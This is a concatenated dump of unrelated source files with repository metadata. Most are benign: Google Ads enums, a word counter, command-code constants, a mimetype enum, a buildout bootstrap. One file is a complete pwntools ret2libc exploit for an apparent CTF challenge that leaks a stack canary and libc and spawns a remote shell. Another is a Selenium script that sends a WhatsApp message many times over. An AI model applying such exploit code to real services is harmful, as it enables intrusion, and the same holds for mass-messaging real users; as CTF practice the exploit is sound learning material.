"Apache-2.0"
] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 1,262 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v9.enums",
marshal="google.ads.googleads.v9",
manifest={"AdGroupCriterionApprovalStatusEnum",},
)
class AdGroupCriterionApprovalStatusEnum(proto.Message):
r"""Container for enum describing possible AdGroupCriterion
approval statuses.
"""
class AdGroupCriterionApprovalStatus(proto.Enum):
r"""Enumerates AdGroupCriterion approval statuses."""
UNSPECIFIED = 0
UNKNOWN = 1
APPROVED = 2
DISAPPROVED = 3
PENDING_REVIEW = 4
UNDER_REVIEW = 5
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
baab7d0a2eeef70ff34b1be7b72ce3daea803683 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/word-count/fe23ec94d69343a3a5a10f713adfd463.py | d52d5cd350e7bed379f1fefa4f8f22ad9bfdec49 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 251 | py | # -*-coding: utf-8-*-
#! /usr/bin/env python3
def word_count(string):
string = string.split()
dico = {}
for word in string:
if word not in dico:
dico[word] = 1
else:
dico[word] += 1
return dico
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
4a90b353d28203a2b13dd7f10e419572b1551633 | 784eca4391204e2352f320d632e29d37ea136f32 | /PracticeCodes/whatsApp.py | b766433acc83e68763c1dd13d356cee6d98734c7 | [] | no_license | JT4life/PythonCodes | e9d7156cff7b58ad6e1fd253cd645e707be6a5d5 | 148229c14b21dc2a34b7f1446b148b1040a84dad | refs/heads/master | 2022-11-07T03:58:07.850557 | 2020-06-15T22:13:10 | 2020-06-15T22:13:10 | 272,554,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from selenium import webdriver
#Download Chrome driver and paste in script folder in python !
driver = webdriver.Chrome()
driver.get('https://web.whatsapp.com/')
name = input('Enter the name of user or group : ')
msg = input('Enter your message : ')
count = int(input('Enter the count : '))
input('Enter anything after scanning QR code')
user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name))
user.click()
msg_box = driver.find_element_by_class_name('_13mgZ')
for i in range(count):
msg_box.send_keys(msg)
button = driver.find_element_by_class_name('_3M-N-')
button.click()
| [
"joshua_4_life@hotmail.com"
] | joshua_4_life@hotmail.com |
0cf32f19f7a7f9aa59508484ced33b621773e946 | 074421d31af92ae29c7c78bdb7e50f199a38eb9b | /weixin/code/rfid_oss/event_manager/command_code.py | 4db7933b49755753bde7e285fbe6ec665b1b3e52 | [] | no_license | allenforrest/wxbiz | 3f49ce66b37e281fc375f548610aa54a0f73268f | e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f | refs/heads/master | 2016-09-06T15:17:49.420934 | 2013-08-05T13:13:40 | 2013-08-05T13:13:40 | null | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,184 | py | #coding=gbk
"""
Copyright (C), 2012-2015, Anything Connected Possibilities
Author: ACP2013
Version: 1.0
Date: 2012-11-22
Description: event manager命令码定义文件
Others:
Key Class&Method List:
1. ....
History:
1. Date:2012-11-22
Author:ACP2013
Modification:新建文件
"""
#OSS 命令码
OSS_BASE = 0x02000000
#一个APP分配0x1000个命令码
EVENT_REPORT_BASE = 0x0
########################################################################
#EVENT MANAGER COMMAND CODE
########################################################################
"""
EVENT_REPORT_COMMAND
data区有1个参数
event_data:上报event数据,pickle编码
没有返回信息
"""
EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 0
"""
EVENT_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 1
"""
EVENT_EXPORT_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 2
"""
EVENT_EXPORT_TASK_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_TASK_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 3
"""
EVENT_FILTER_LIST_REQUEST
data区没有参数
返回 EventFilterListResponse 的JSON编码
"""
EVENT_FILTER_LIST_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 4
"""
EVENT_IMC_QUERY_EAU_REQUEST
data区有1个参数
query_req:EventImcQueryEauRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_IMC_QUERY_EAU_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 5
"""
EVENT_QUERY_TO_IMC_REQUEST,消息格式同 EVENT_QUERY_REQUEST,用于IMC向EAU查询
"""
EVENT_QUERY_TO_IMC_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 6
"""
WEB_EVENT_REPORT_COMMAND,用于WEB相关模块向event manager发送事件
"""
WEB_EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 7
if __name__=='__main__':
print EVENT_QUERY_REQUEST, EVENT_EXPORT_REQUEST, EVENT_EXPORT_TASK_QUERY_REQUEST, EVENT_IMC_QUERY_EAU_REQUEST, WEB_EVENT_REPORT_COMMAND
| [
"allenxu@gmail.com"
] | allenxu@gmail.com |
ec593b0300c2aa722f382c36dbd9335956e4a56d | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/processor/mimetype/enumerations.py | 8547e4fb1a4820fa3604c5a82da52f2bd920b44c | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # -*- coding: utf-8 -*-
"""
mimetype enumerations module.
"""
from pyrin.core.enumerations import CoreEnum
class MIMETypeEnum(CoreEnum):
"""
mimetype enum.
"""
TEXT = 'text/plain'
HTML = 'text/html'
JAVASCRIPT = 'text/javascript'
OCTET_STREAM = 'application/octet-stream'
JSON = 'application/json'
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
6b5c8c1161631de22919ca67fea10198953e24c0 | 60f1981f8fb7717a92921c0b7404f6eac06b100b | /Pwn/flag/random_rope.py | 680882cfec123c4fd91d1ae75f50f36746659b1c | [] | no_license | MidnightFlag/CTF2021 | 765d73d227c23cea1df2bbf61a95b2c915be41ee | 5b477472b1491ec7351f75b68f3d8883760e4280 | refs/heads/main | 2023-04-08T13:57:29.767417 | 2021-04-19T18:13:29 | 2021-04-19T18:13:29 | 310,705,849 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | #!/usr/bin/env python3
from pwn import *
proc = remote("172.17.0.6", 8888)
libc = ELF("./libc-2.28.so")
#proc = process("/home/kali/Documents/SB/MidnightCTF/PWN/pwn/infra/5_random_rope/random_rope")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
leak = proc.recvuntil(b":\n\n").decode()
log.info(leak)
log.info("Parsing the leak...")
leak = leak.split("\n")[1].split(":")[1].split(" ")
if int(leak[-5] )< 0:
canary = (1 << 32) + int(leak[-5])
else:
canary = int(leak[-5])
saved_ebp = (1 << 32) + int(leak[-2])
saved_eip = int(leak[-1])
pc_thunk = int(leak[-3])
pad = int(leak[-4])
log.info("Padding 1 : {}".format(hex(pad)))
log.info("Pc_thunk : {}".format(hex(pc_thunk)))
log.info("Canary : {}".format(hex(canary)))
log.info("Saved EBP : {}".format(hex(saved_ebp)))
log.info("Saved EIP : {}".format(hex(saved_eip)))
log.info("Crafting Payload...")
# Step 1 : Locate a print function (puts, puts...) so we can leak a libc function address by passing a GOT function's entry to it as a parameter.
plt_puts = 0x00001050 # Offset between the base addr and the PLT entry for "puts".
post_vuln_call = 0x00001290 # Offset between the base addr and the instruction that follows the call to "vuln", aka the saved_eip while we are in the "vuln" stackframe.
offset_plt_vuln = post_vuln_call - plt_puts # Offset between post_vuln_call and the PLT entry for the "puts" function.
real_plt_puts = saved_eip - offset_plt_vuln # PLT entry for the "puts" function at runtime.
log.info("PLT entry for 'puts' : {}".format(hex(real_plt_puts)))
# Step 2 : Locate the GOT entry for any function of the LIBC, so we can read the entry using "puts" and leak memory
got_puts = 0x00004014 # GOT entry for "scanf"
offset_got_vuln = got_puts - post_vuln_call # Offset between post_vuln_call and the GOT entry for "scanf"
real_got_puts = saved_eip + offset_got_vuln # GOT entry for the "scanf" function at runtime
log.info("GOT entry for 'puts' : {}".format(hex(real_got_puts)))
# Step 3 : Locate the "main" function address, so we can ret2main after leaking the libc and abuse the buffer overflow again.
main_addr = 0x00001259 # Offset between the base addr and the start of the main function
offset_main_vuln = post_vuln_call - main_addr # Offset between the post_vuln_call and the main
ret2main = saved_eip - offset_main_vuln # "main" function address at runtime
log.info("Main address : {}".format(hex(ret2main)))
# Step 4 : Locate a gadget "pop ebx;ret", so we can use it to control paramaters of the functions we want to call.
gadget = 0x0000101e
offset_pop_vuln = post_vuln_call - gadget
real_gadget = saved_eip - offset_pop_vuln
log.info("POP EBX;RET address : {}".format(hex(real_gadget)))
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + plt_puts + pop ebx;ret + got_scanf + ret2main")
# Step 5 : build the payload and leak libc
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP.
payload += p32(real_plt_puts) # Rewrite the saved EIP in order to call puts from the PLT stub.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter for puts.
payload += p32(real_got_puts) # Parameter for puts, which is the GOT entry for the scanf function, leaking the libc. (-1 so we are sure to get the whole thing, and to not crash the program)
payload += p32(ret2main) # Ret2main so we can abuse the buffer overflow again.
log.info("Sending payload...")
proc.sendline(payload)
answer = proc.recvuntil(b':\n\n')
log.info("{}".format(answer))
leak_scanf = u32(answer.split(b"\n\n\n")[2][:4])
log.info("'Scanf' function leak : {}".format(hex(leak_scanf)))
log.info("Locating 'system' function and exploiting the overflow again...")
# Step 6 : compute system() address and find a "/bin/sh" string, so we can jump on system() and get a shell
leak_system = leak_scanf - libc.symbols["puts"] + libc.symbols["system"]
leak_binsh = leak_scanf - libc.symbols["puts"] + next(libc.search(b"/bin/sh\x00"))
log.info("'System' function leak : {}".format(hex(leak_system)))
log.info("'/bin/sh\\x00' found at : {}".format(hex(leak_binsh)))
log.info("Crafting Payload...")
# Step 7 : build the final payload and get the shell
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP -> that's an old EBP, we could use the new saved_ebp value but that's not a need.
payload += p32(leak_system) # Rewrite the saved EIP in order to call the "system" function from the LIBC.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter.
payload += p32(leak_binsh) # Parameter for system "/bin/sh\x00"
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + system + pop ebx;ret + '/bin/sh'")
log.info("Sending payload...")
proc.sendline(payload)
# Step 8 : enjoy ;)
proc.interactive()
| [
"a@example.com"
] | a@example.com |
6e5ba839aad177f589f4dc24bb5b707e6d35e625 | 89f0df65abe01e273fd7cf0606727c777352ba47 | /Python/code_comp/Programmeringsolympiaden/Kalas/bool mash.py | 310e301ab3cd4f230aa659a223e41781f3dcbaca | [] | no_license | cqann/PRGM | 486122601b959cfbf7d9d2dc2a37caa858cf15a8 | 7387dafb65895528c042a3f1ab605fa5325056ce | refs/heads/master | 2022-02-16T00:59:32.342327 | 2022-01-27T16:55:46 | 2022-01-27T16:55:46 | 226,111,892 | 0 | 1 | null | 2020-11-16T17:41:44 | 2019-12-05T13:45:21 | Python | UTF-8 | Python | false | false | 665 | py | import sys
import time
n_kalas, k = [int(x) for x in sys.stdin.readline().split(" ")]
s_w_h = [int(x) for x in sys.stdin.readline().split(" ")]
w_s = [0]
afford = 0
las = -1
hours = 0
list_w_hours = []
list_w_time = []
for i in range(n_kalas):
cur_kalas = [int(x) for x in sys.stdin.readline().split(" ")]
m_n_w = [x for x in cur_kalas[2:] if x not in w_s]
hours += sum([s_w_h[x-1] for x in m_n_w])
w_s += m_n_w
list_w_hours.append(hours)
afford += (cur_kalas[0]-las-1)*10
list_w_time.append(afford)
las = cur_kalas[0]
if all([x >= y for x,y in zip(list_w_time, list_w_hours)]):
print("Ja")
else:
print("Nej")
| [
"cqann.lindberg@gmail.com"
] | cqann.lindberg@gmail.com |
1da24edb58c87a6f4a8613ad31c9849e3494deae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/103/usersdata/158/50598/submittedfiles/av1_3.py | d2648f5498338309230c4b00a56edb940359b628 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
import math
a=int(input('digite a:'))
b=int(input('digite b:'))
cont=0
i=1
for i in range(1,b+1,1):
if a%2==0:
cont=cont+1
i=i+1
if cont==0:
print(i)
else:
print('Nao existe')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62bd663ff66daf8ad4c15a4551a219a9bfa76552 | afa456bb3792e433d84684260cdce1dbc6302cde | /authors/apps/article/renderer.py | 0941a3177f37f34445aeaec6aa777ad01913eddf | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-poseidon | 23ac16e9fcdce49f78df04126f9f486b8c39ebd4 | d2b561e83ed1e9a585853f4a4e2e37805e86c35c | refs/heads/develop | 2022-12-09T07:38:04.843476 | 2019-07-19T13:44:13 | 2019-07-19T13:44:13 | 158,799,017 | 1 | 4 | BSD-3-Clause | 2022-12-08T01:19:16 | 2018-11-23T07:55:00 | Python | UTF-8 | Python | false | false | 753 | py | """
Renderer classes go here
"""
import json
from rest_framework.renderers import JSONRenderer
class ArticleJSONRenderer(JSONRenderer):
"""
Override default renderer to customise output
"""
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
render response data
:param data:
:param accepted_media_type:
:param renderer_context:
:return:
"""
if isinstance(data, list):
errors = None
else:
errors = data.get('errors', None)
if errors is not None:
return super(ArticleJSONRenderer, self).render(data)
return json.dumps({
'articles': data
})
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
f39c8bd81c9f14438fcaf68af7acdfe08b6002a1 | 30227ff573bcec32644fca1cca42ef4cdd612c3e | /leetcode/binary_tree/tests/test_levelorder_traversal.py | 04f4e411c877f489a2031650a1adce5140460d2b | [] | no_license | saurabh-pandey/AlgoAndDS | bc55864422c93e6c93b8432e483394f286ce8ef2 | dad11dedea9ceb4904d6c2dea801ce0172abfc81 | refs/heads/master | 2023-07-01T09:12:57.951949 | 2023-06-15T12:16:36 | 2023-06-15T12:16:36 | 88,239,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | import pytest
import binary_tree.levelorder_traversal as prob
import binary_tree.operations as bTree
class TestPostorderTraversal:
def test_example1_1(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.createUsingCompleteList(root)
assert prob.levelOrder(rootNode) == res
def test_example1_2(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.create(root)
assert prob.levelOrder(rootNode) == res | [
"saurabhpandey85@gmail.com"
] | saurabhpandey85@gmail.com |
c56e5bd714efca6e91bff4a72bd13e7dbd1a954a | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5688567749672960_1/Python/frigidrain/A.py | db7c051b27a5e302d31af53d0b46fc3b0d29e195 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import fileinput
import math
from collections import deque
def flip(n):
res = 0
while(n > 0):
digit = n%10
res = res * 10 + digit
n /= 10
return res
def solve(n):
res = 0
while n > 19:
# print n
if n % 10 == 0:
n -= 1
res += 1
continue
length = len(str(n))
secondhalf = n % (10**(length/2))
# print secondhalf
take = secondhalf - 1
res += take
n -= take
# reverse if it helps
rev = flip(n)
if rev < n:
n = rev
res += 1
# print n
take = n % (10**(length - 1))
res += take + 2
n -= take + 2
return res + n
f = fileinput.input()
T = int(f.readline())
for t in range(T):
n = int(f.readline())
solve(n)
print "Case #{0}: {1}".format(t + 1, solve(n))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
62434b8a6735fc1a9f7355464680ab37f69140cc | 4ac687bc28b9f5cf7f822e9d4c0db8b46fe363b3 | /88-Merge_Sorted_Array.py | 648b3e7fbf941c1b8741ec21892efe0d755d71da | [
"MIT"
] | permissive | QuenLo/LeetCode-share | b1e75e02e1dfe85be44ddb0ae1f4345353b0b569 | ce861103949510dc54fd5cb336bd992c40748de2 | refs/heads/master | 2021-12-23T11:23:09.111711 | 2021-11-15T18:54:46 | 2021-11-15T18:54:46 | 131,681,273 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | # Time complexity : O(n + m)
# Space: O(m)
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:m]
l, k = 0, 0
for p in range( m+n ):
if( (l < m and k < n and nums1_copy[l] <= nums2[k]) or k >= n ):
nums1[p] = nums1_copy[l]
l += 1
else:
nums1[p] = nums2[k]
k += 1
class SolutionII:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if n < 1:
return
if (m) < 1:
nums1[:] = nums2[:]
return
nums1_copy = nums1[:]
l, k = 0, 0
while l < (m) or k < n:
if ( k >= n ):
nums1[l+k] = nums1_copy[l]
l += 1
elif ( l >= (m) ):
nums1[l+k] = nums2[k]
k+= 1
elif ( nums1_copy[l] <= nums2[k] ):
nums1[l+k] = nums1_copy[l]
l += 1
elif( nums1_copy[l] > nums2[k] ):
nums1[l+k] = nums2[k]
k += 1
| [
"noreply@github.com"
] | QuenLo.noreply@github.com |
744fba312f2b3ca31eb82c521b058139f9d7e0db | a8be4698c0a43edc3622837fbe2a98e92680f48a | /SSAFY알고리즘정규시간 Problem Solving/9월 Problem Solving/0930/3752가능한시험점수.py | e7305e71e4818c10983b34c211bc0b4567250260 | [] | no_license | blueboy1593/algorithm | fa8064241f7738a12b33544413c299e7c1e1a908 | 9d6fdd82b711ba16ad613edcc041cbecadd85e2d | refs/heads/master | 2021-06-23T22:44:06.120932 | 2021-02-21T10:44:16 | 2021-02-21T10:44:16 | 199,543,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | import sys
sys.stdin = open("3752_input.txt", "r")
T = int(input())
# 그거 해보자 list에 index로 점수 기입해보기.
def DFS(i, jumsoo):
jumsoo += grade[i]
grade_set.add(jumsoo)
for j in range(i + 1, N):
TF[j] = False
DFS(j, jumsoo)
TF[j] = True
for tc in range(1, T + 1):
N = int(input())
grade = list(map(int, input().split()))
grade_set = set()
for i in range(len(grade)):
TF = [ False ] * N
jumsoo = 0
DFS(i, jumsoo)
result = len(grade_set) + 1
print("#%d %d" %(tc, result)) | [
"snb0303@naver.com"
] | snb0303@naver.com |
550425985d4b721c0fee84ae9bcc6571903970de | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KPicBthv6WhHFGapg_21.py | b72401fb304ce28ac7d951cec22bc9d33168f6f1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | """
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") ➞ 6
count_syllables("bobobobobobobobo") ➞ 8
count_syllables("NANANA") ➞ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
txt=txt.lower()
co=txt[0:2]
ko=txt.count(co)
return (ko)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
386610dd251f9e3784e15ef74695779b95f74588 | 9c20b0f0ad729b77e970dedaf4a138c99b4364bc | /Lib/site-packages/phonenumbers/data/region_TN.py | 876916c6ca828f0dbe4ce8ea6dd9787c2e55166d | [] | no_license | GlovesMaker/Sklepinternetowy | 4459f8651d2280e4840cfb293de28f9413df68af | d05372e96f7238c9459caf4f7a890a5a6f2bb2c3 | refs/heads/master | 2022-12-22T02:43:33.628016 | 2018-09-11T18:20:37 | 2018-09-11T18:20:37 | 167,855,928 | 0 | 1 | null | 2022-12-08T05:55:04 | 2019-01-27T20:36:42 | Python | UTF-8 | Python | false | false | 1,103 | py | """Auto-generated file, do not edit by hand. TN metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_TN = PhoneMetadata(id='TN', country_code=216, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-57-9]\\d{7}', possible_length=(8,)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:3[0-2]\\d{3}|7\\d{4}|81200)\\d{3}', example_number='30010123', possible_length=(8,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:[259]\\d{3}|3(?:001|1(?:[1-35]\\d|40)|240|6[0-4]\\d|91\\d)|4[0-6]\\d{2})\\d{4}', example_number='20123456', possible_length=(8,)),
toll_free=PhoneNumberDesc(national_number_pattern='8010\\d{4}', example_number='80101234', possible_length=(8,)),
premium_rate=PhoneNumberDesc(national_number_pattern='88\\d{6}', example_number='88123456', possible_length=(8,)),
shared_cost=PhoneNumberDesc(national_number_pattern='8[12]10\\d{4}', example_number='81101234', possible_length=(8,)),
number_format=[NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3')])
| [
"buchar123@gmail.com"
] | buchar123@gmail.com |
8e8bfc220f7a7cb3625dcb6c3cd32dbb38472d3e | d82b4a4e710642dd38c944890671f21b2099232f | /Algorithm-python/_review/section4_ReverseSequence.py | b165ed2587bf79af6edb642fd01521716347485f | [] | no_license | somsomdah/Algorithm | 31a36d01bc0e1873dee3d95789dcff3dd68a9b09 | cd7f6f25fda5aef17495e11c20b54561d83674c5 | refs/heads/master | 2023-05-24T20:04:32.466801 | 2023-05-19T10:53:27 | 2023-05-19T10:53:27 | 236,322,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # 해결 못함
n=int(input())
seq=list(map(int,input().split()))
res=[0]*n
for i in range(0,n):
count=0
for j in range(0,n):
if res[j]==0:
count+=1
if count==seq[i]:
res[j]=i+1
print(res)
| [
"somdah98@gmail.com"
] | somdah98@gmail.com |
0c30d9ccebce25bb64383a0092ff2a31ff517dfa | b9ed8f5edf787f1a7df567a1b01086dc045427ba | /official/projects/mae/configs/mae.py | 00691534b0760e4f37705c52d877976ffcc55079 | [
"Apache-2.0"
] | permissive | stjordanis/models | 787183f973f8cd4152f328de2368dbef17376488 | 84e1f30cdb5015848cb0d9e38e5b3f0551953b7c | refs/heads/master | 2023-03-18T08:46:29.986735 | 2023-03-07T23:26:36 | 2023-03-07T23:27:43 | 143,071,287 | 0 | 0 | Apache-2.0 | 2018-07-31T21:18:06 | 2018-07-31T21:18:05 | null | UTF-8 | Python | false | false | 3,612 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MAE configurations."""
import dataclasses
from typing import Tuple
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import optimization
from official.vision.configs import image_classification
@dataclasses.dataclass
class MAEConfig(cfg.TaskConfig):
"""The translation task config."""
train_data: cfg.DataConfig = cfg.DataConfig()
validation_data: cfg.DataConfig = cfg.DataConfig()
masking_ratio: float = 0.75
patch_h: int = 14
patch_w: int = 14
num_classes: int = 1000
input_size: Tuple[int, int] = (224, 224)
norm_target: bool = False
@exp_factory.register_config_factory('mae_imagenet')
def mae_imagenet() -> cfg.ExperimentConfig:
"""Config to get results that matches the paper."""
train_batch_size = 4096
eval_batch_size = 4096
imagenet_size = 1281167
steps_per_epoch = imagenet_size // train_batch_size
config = cfg.ExperimentConfig(
task=MAEConfig(
train_data=image_classification.DataConfig(
tfds_name='imagenet2012',
tfds_split='train',
is_training=True,
global_batch_size=train_batch_size,
shuffle_buffer_size=10000,
crop_area_range=(0.2, 1.0),
),
validation_data=image_classification.DataConfig(
tfds_name='imagenet2012',
tfds_split='validation',
is_training=False,
global_batch_size=eval_batch_size,
drop_remainder=False,
)
),
trainer=cfg.TrainerConfig(
train_steps=800 * steps_per_epoch,
validation_steps=24,
steps_per_loop=1000,
summary_interval=1000,
checkpoint_interval=1000,
validation_interval=1000,
max_to_keep=5,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'adamw',
'adamw': {
'beta_2': 0.95,
'weight_decay_rate': 0.05,
# Avoid AdamW legacy behavior.
'gradient_clip_norm':
0.0,
'exclude_from_weight_decay': [
'LayerNorm', 'layer_norm', 'bias']
}
},
'learning_rate': {
'type': 'cosine',
'cosine': {
'initial_learning_rate':
1.5 * 1e-4 * train_batch_size / 256,
'decay_steps': 800 * steps_per_epoch
}
},
'warmup': {
'type': 'linear',
'linear': {
'warmup_steps': 40 * steps_per_epoch,
'warmup_learning_rate': 0
}
}
})
),
restrictions=[
'task.train_data.is_training != None',
])
return config
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
0328881cc74e66f9635e839f9d1e6dcc0f05d091 | 5748b92c451efe67fabc9e588dcd5dcedbe29c36 | /buildout/Naaya/zope210/bootstrap.py | 1fc174920923155818686f3b128bdbba7d09e16c | [] | no_license | Hamzahashmi4444/Salman | 146d30303ff738f9c78525466b039e7a6a7bd1bb | 611ac05be7771a46b26ff243359cfcafce738cb1 | refs/heads/master | 2023-02-16T14:05:35.070709 | 2021-01-18T06:56:23 | 2021-01-18T06:56:23 | 330,587,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,248 | py | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
$Id$
"""
import os, shutil, sys, tempfile, urllib2
from optparse import OptionParser
